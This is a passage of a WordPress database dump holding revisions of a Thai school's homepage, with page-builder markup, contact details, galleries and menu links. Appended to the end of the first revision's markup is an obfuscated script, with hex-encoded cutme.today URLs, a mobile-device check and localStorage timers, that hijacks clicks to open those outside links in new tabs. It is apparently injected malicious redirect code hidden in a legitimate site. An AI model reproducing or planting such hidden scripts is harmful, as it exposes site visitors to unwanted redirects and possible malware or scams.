{\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-07 21:42:49','2024-08-07 14:42:49','',14,'http://pakhaeng.ssk.in.th/?p=670',0,'revision','',0),
(671,1,'2024-08-07 21:49:47','2024-08-07 14:49:47','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"slidesScroll\":\"all\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container 